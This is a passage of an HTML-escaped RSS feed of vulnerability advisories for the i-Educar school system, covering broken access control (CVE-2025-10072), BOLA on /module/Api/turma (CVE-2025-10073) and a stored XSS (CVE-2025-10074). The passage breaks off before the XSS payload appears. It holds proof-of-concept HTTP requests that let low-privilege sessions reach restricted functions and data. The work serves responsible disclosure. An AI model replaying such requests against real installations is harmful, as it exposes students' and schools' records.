&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /matricula/206/enturmar/23 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/intranet/educar_matricula_turma_lst.php?ref_cod_matricula=206&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;ano_letivo=2025
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=Mz9IKWGOP641g4BLkSGRnxs69wk4ChmUUxUerX19
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;We could observe that we have access to the page and to the function to sign students from classes. And, this user, should not do that.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10072/image-2.png&amp;#34;
	width=&amp;#34;1555&amp;#34;
	height=&amp;#34;666&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10072/image-2_hu_d70819db70f9d571.png 480w, /p/cve-2025-10072/image-2_hu_b5fb0c0419366edd.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;233&amp;#34;
		data-flex-basis=&amp;#34;560px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Broken Access Control vulnerabilities can have severe consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to restricted functionality;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation of privileges for low-level users;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Exposure of sensitive data and potential system compromise;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Loss of confidentiality and integrity of educational records;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputational damage to the organization.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10072.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10072.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 07 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10073</title>
        <link>https://www.cvehunters.com/p/cve-2025-10073/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10073/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10073-broken-object-level-authorization-bola-allows-enumeration-of-classes-data-via-moduleapiturma&amp;#34;&amp;gt;CVE-2025-10073: Broken Object Level Authorization (BOLA) allows enumeration of classes data via &amp;lt;code&amp;gt;/module/Api/turma&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10073&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10073&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Object Level Authorization (BOLA) vulnerability was identified in the &amp;lt;code&amp;gt;/module/Api/turma&amp;lt;/code&amp;gt; endpoint of the i-Educar application.This flaw allows a user without proper permissions to query the endpoint and retrieve ** class information** by manipulating request parameters.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Although this vulnerability does not directly expose individual student data, it still constitutes an &amp;lt;b&amp;gt;unauthorized disclosure of academic structure information&amp;lt;/b&amp;gt;, which can be leveraged for enumeration or as a stepping stone for further attacks.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10073-broken-object-level-authorization-bola-allows-enumeration-of-classes-data-via-moduleapiturma&amp;#34;&amp;gt;CVE-2025-10073: Broken Object Level Authorization (BOLA) allows enumeration of classes data via &amp;lt;code&amp;gt;/module/Api/turma&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10073&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10073&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Object Level Authorization (BOLA) vulnerability was identified in the &amp;lt;code&amp;gt;/module/Api/turma&amp;lt;/code&amp;gt; endpoint of the i-Educar application.This flaw allows a user without proper permissions to query the endpoint and retrieve ** class information** by manipulating request parameters.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Although this vulnerability does not directly expose individual student data, it still constitutes an &amp;lt;b&amp;gt;unauthorized disclosure of academic structure information&amp;lt;/b&amp;gt;, which can be leveraged for enumeration or as a stepping stone for further attacks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /module/Api/turma&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to enforce &amp;lt;b&amp;gt;object-level authorization&amp;lt;/b&amp;gt;when handling this endpoint. As a result, any authenticated user can manipulate the request values to access sensitive information (names, IDs, enrollment status) of students.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Expected behavior:&amp;lt;/b&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Only authorized roles (e.g., administrators, coordinators, teachers linked to the class) should be able to access this data.&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;Unauthorized users should receive 403 Forbidden or an empty response.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Observed behavior:&amp;lt;/br&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Any authenticated user (even low-privilege accounts) can access this endpoint and retrieve sensitive information about academic classes.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Authenticate as a non-privileged user (e.g., student, professor).&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10073/image.png&amp;#34;
	width=&amp;#34;1380&amp;#34;
	height=&amp;#34;528&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10073/image_hu_e9ed6b29581f01dc.png 480w, /p/cve-2025-10073/image_hu_374181a535d27950.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;261&amp;#34;
		data-flex-basis=&amp;#34;627px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10073/image-1.png&amp;#34;
	width=&amp;#34;846&amp;#34;
	height=&amp;#34;616&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10073/image-1_hu_29ac0d2382b460d0.png 480w, /p/cve-2025-10073/image-1_hu_5d2f89eaf0785474.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;137&amp;#34;
		data-flex-basis=&amp;#34;329px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Send the following request:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/Api/turma?&amp;amp;amp;oper=get&amp;amp;amp;resource=turma&amp;amp;amp;id=14 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: application/json, text/javascript, */*; q=0.01
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/intranet/educar_turma_det.php?cod_turma=14
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=[low-privileged-session]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10073/image-2.png&amp;#34;
	width=&amp;#34;1574&amp;#34;
	height=&amp;#34;679&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10073/image-2_hu_7058d38f59e7fa4a.png 480w, /p/cve-2025-10073/image-2_hu_e22ce1bb894a2051.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;231&amp;#34;
		data-flex-basis=&amp;#34;556px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;We could observe that informations about classes were returned.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This vulnerability is a Broken Object Level Authorization (BOLA) issue (OWASP API Top 10 - 2023, A01), allowing sensitive data exposure. Any authenticated user can access personal information of other users. This can lead to:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive PII;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Violation of data protection laws (e.g., LGPD, GDPR);&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Potential abuse of user data or impersonation;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;User enumeration.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10073.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10073.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 07 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10074</title>
        <link>https://www.cvehunters.com/p/cve-2025-10074/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10074/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10074-multiples-cross-site-scripting-xss-stored-in-endpoint-usuariostiposid&amp;#34;&amp;gt;CVE-2025-10074: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;/usuarios/tipos/(ID)&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10074&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10074&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;/usuarios/tipos/(ID)&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Tipos de Usuário&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Descrição&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10074-multiples-cross-site-scripting-xss-stored-in-endpoint-usuariostiposid&amp;#34;&amp;gt;CVE-2025-10074: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;/usuarios/tipos/(ID)&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10074&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10074&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;/usuarios/tipos/(ID)&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Tipos de Usuário&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Descrição&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet//usuarios/tipos/(ID)&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;Tipos de Usuário&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Descrição&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Tipos de Usuário&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Descrição&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
